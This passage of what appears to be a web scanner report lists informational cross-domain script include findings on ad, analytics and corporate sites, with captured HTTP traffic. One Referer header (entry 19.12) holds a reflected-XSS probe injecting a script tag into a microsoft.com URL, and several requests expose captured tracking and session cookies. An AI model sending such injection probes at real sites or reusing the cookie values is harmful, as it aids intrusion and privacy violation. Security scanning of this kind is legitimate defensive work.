When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://a.fsdn.com/adops/google/rev2/afc/sf_google_afc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.fsdn.com
Path:	/adops/google/rev2/afc/sf_google_afc.js

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /adops/google/rev2/afc/sf_google_afc.js HTTP/1.1
Host: a.fsdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
ETag: "243000a-1f3f-48d91559d7740"
Last-Modified: Wed, 11 Aug 2010 19:34:13 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 7999
Cache-Control: public, max-age=550926
Expires: Fri, 29 Jul 2011 13:44:31 GMT
Date: Sat, 23 Jul 2011 04:42:25 GMT
Connection: close

function sf_appendAFCCSS(numAds) {
/* If CSS path is not provided and site or adtype are not defined, fail. */
if (!window.csspath && (!window.site || !window.adtype))
return false;

/* Pull some i
...[SNIP]...
age', 'Javascript');
afcScript.setAttribute('src', 'http://pagead2.googlesyndication.com/pagead/show_ads.js');
document.getElementsByTagName('head')[0].appendChild(afcScript);
*/
document.write('<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

19.2. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?

Request

Response

19.3. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

19.4. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5767.dsc.discoveryOX2348/B5649101.33

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=921394&site=65851782&code=42853597&randnum=1138821
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.5. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.10

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575094&code=42823586&randnum=1100758
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.11

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575096&code=42825637&randnum=1107821
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.12

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575097&code=42823090&randnum=1100774
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.16

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575105&code=42823584&randnum=2561368
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.17

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575107&code=42825515&randnum=2561399
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.10. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pubmatic.com
Path:	/HostedThirdPartyPixels/TF/ae_12232010.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://tags.expo9.exponential.com/tags/AudienceSelectPublishers/AudienceSelect/tags.js
http://tags.expo9.exponential.com/tags/PubmaticAE/AudienceSelect/tags.js

Request

GET /HostedThirdPartyPixels/TF/ae_12232010.html HTTP/1.1
Host: ads.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DPFQ=6~4~1305207255; PUBUIDSYNCUPFQ=1~1305207254:4~1305207255; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256; KTPCACOOKIE=YES; SyncRTB=6_1311357663.3_1311357663.5_1311357663.4_1311357663.1_1311357663.2_1311357663.16_1311360179.10_1311360179.7_1311360179.8_1311360179.9_1311360179.12_1311360179; PUBMDCID=2; pubtime_26922=TMC; PMDTSHR=cat:; KRTBCOOKIE_58=1344-AA-00000001931708427; KRTBCOOKIE_80=1336-2ecd6c1e-5306-444b-942d-9108b17fd086.38747.66267.38582.39303.; KRTBCOOKIE_57=476-uid:6516234360771219075; KRTBCOOKIE_107=1471-uid:0892d3fc-c93f-4985-8ab2-420c545c19b6

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:42:57 GMT
Expires: Sat, 23 Jul 2011 09:04:41 GMT
Last-Modified: Tue, 29 Mar 2011 14:07:54 GMT
Cache-Control: max-age=172800
Content-Type: text/html; charset=UTF-8
ETag: "7b47ce-1da-961de280"
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 474

<html>

<body>
<script type="text/javascript"></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/PubmaticAE/AudienceSelect/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/AudienceSelectPublishers/AudienceSelect/tags.js"></script>
...[SNIP]...

19.11. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aka-cdn-ns.adtechus.com
Path:	/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=' + ord + '?

Request

GET /apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js HTTP/1.1
Host: aka-cdn-ns.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 16 Jul 2011 03:26:39 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=313620
Expires: Tue, 26 Jul 2011 19:55:38 GMT
Date: Sat, 23 Jul 2011 04:48:38 GMT
Content-Length: 265
Connection: close

if (typeof ord=='undefined') {ord=Math.random()*10000000000000000;}
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=' + ord + '?" type="text/javascript"><\/script>
...[SNIP]...

19.12. http://analytics.microsoft.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.microsoft.com
Path:	/Sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311189489524:ss=1311187844264; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/20/2011 22:17:59&Microsoft.VisitStartDate=07/20/2011 21:50:50&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=17&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet:1=:2=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:31 GMT
Accept-Ranges: bytes
ETag: "e94f40652ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Thu, 21 Jul 2011 17:35:37 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

19.13. http://analytics.msn.com/Include.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.msn.com
Path:	/Include.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /Include.html HTTP/1.1
Host: analytics.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://analytics.microsoft.com/Sync.html
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; CULTURE=EN-US; MSNRPSShare=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:27 GMT
Accept-Ranges: bytes
ETag: "fa66cf352ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Thu, 21 Jul 2011 17:35:52 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

19.14. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The response dynamically includes the following script from another domain:

https://h.online-metrix.net/fp/check.js?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '

Request

Response

19.15. http://assets.tumblr.com/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.tumblr.com
Path:	/iframe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

19.16. http://betaworks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://betaworks.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: betaworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 16:23:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6834
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Betaworks</title>
<meta h
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen, print" href="css/betaworks_got_style.css">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

19.17. http://c627028.r28.cf2.rackcdn.com/google28reddefaultsUSA728x90.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c627028.r28.cf2.rackcdn.com
Path:	/google28reddefaultsUSA728x90.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /google28reddefaultsUSA728x90.html HTTP/1.1
Host: c627028.r28.cf2.rackcdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 25 Jun 2011 22:03:50 GMT
ETag: 087aa9903a689c01545c9e45dbf84fac
Vary: Accept-Encoding
Server: nginx/0.7.65
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
x-trans-id: txad5e3bbfef3844d7af8c043c1a31933a
Content-Length: 763
Cache-Control: public, max-age=2106
Expires: Sat, 23 Jul 2011 05:24:03 GMT
Date: Sat, 23 Jul 2011 04:48:57 GMT
Connection: close

<html>

<head>

<title></title>

</head>

<body style="margin:0; padding:0;">

<div align="center">

<script type="text/javascript"><!--
google_ad_client = "ca-pub-7458326009451431";
/*
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19.18. http://c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c627028.r28.cf2.rackcdn.com
Path:	/google29reddefaultsUSA728x90.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /google29reddefaultsUSA728x90.html HTTP/1.1
Host: c627028.r28.cf2.rackcdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/google28reddefaultsUSA728x90.html

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 25 Jun 2011 22:03:55 GMT
ETag: ffe60b5c4d2be06bb49b0623737911bc
Vary: Accept-Encoding
Server: nginx/0.7.65
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
x-trans-id: tx62da00dace0b4f85b0ad48aa3567ca7a
Content-Length: 894
Cache-Control: public, max-age=3280
Expires: Sat, 23 Jul 2011 05:43:42 GMT
Date: Sat, 23 Jul 2011 04:49:02 GMT
Connection: close

<html>

<head>

<title></title>

</head>

<body style="margin:0; padding:0;">

<div align="center">

<script type="text/javascript"><!--
google_ad_client = "ca-pub-7458326009451431";
/*
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19.19. http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c627028.r28.cf2.rackcdn.com
Path:	/v36defaultsusa728x90btf.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.lijit.com/delivery/fp?u=curse&z=125814&n=1

Request

GET /v36defaultsusa728x90btf.html HTTP/1.1
Host: c627028.r28.cf2.rackcdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 25 Jun 2011 22:04:45 GMT
ETag: b71d9513fe6ec1c41213440500f995a4
Vary: Accept-Encoding
Server: nginx/0.7.65
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
x-trans-id: txfdfea563702d4227aea2450ea96e87aa
Content-Length: 283
Cache-Control: public, max-age=1438
Expires: Sat, 23 Jul 2011 05:13:04 GMT
Date: Sat, 23 Jul 2011 04:49:06 GMT
Connection: close

<html>

<head>

<title></title>

</head>

<body style="margin:0; padding:0;">

<div align="center">

<div id="lijit_region_125814"></div>
<script type="text/javascript" src="http://www.lijit.com/delivery/fp?u=curse&z=125814&n=1"></script>
...[SNIP]...

19.20. https://code.google.com/p/domsnitch/downloads/detail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://code.google.com
Path:	/p/domsnitch/downloads/detail

Issue detail

The response dynamically includes the following scripts from other domains:

https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/dit_scripts.js
https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/ph_core.js

Request

Response

19.21. https://code.google.com/p/domsnitch/downloads/list previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://code.google.com
Path:	/p/domsnitch/downloads/list

Issue detail

The response dynamically includes the following scripts from other domains:

https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/dit_scripts.js
https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/ph_core.js

Request

GET /p/domsnitch/downloads/list HTTP/1.1
Host: code.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=247248150.1305748931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; __utma=247248150.2016126898.1305748931.1305748931.1306544342.2; NID=49=nwK0YeFQgiA75AfdZgSdSHlwxJbK2A2cV_USi565w0PVqPxP8Z_r44EtseUIkjPH9QzYcj49dhKdG9KIrxQkEfj8lGl3kOkFx8-uLi3G6X3lprtx8Eqr5zx5hUV0AOyO

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:03:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
Content-Length: 18440
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="https://ssl.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

var code
...[SNIP]...
</div>
<script type="text/javascript" src="https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/dit_scripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/ph_core.js"></script>
...[SNIP]...

19.22. http://code.msdn.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.code.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.code.msdn.s-msft.com/pageresource.js?groupname=samplesscripts&v=2011.7.19.3457
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=&cver=0001

Request

Response

19.23. http://consultants-locator.apple.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://consultants-locator.apple.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://apple.ugc.bazaarvoice.com/static/1029/bvapi.js
http://maps.google.com/maps/api/js?sensor=false

Request

Response

19.24. http://corp.klout.com/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/blog/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://platform.twitter.com/widgets.js
http://stats.wordpress.com/e-201129.js
http://w.sharethis.com/button/sharethis.js

Request

GET /blog/ HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
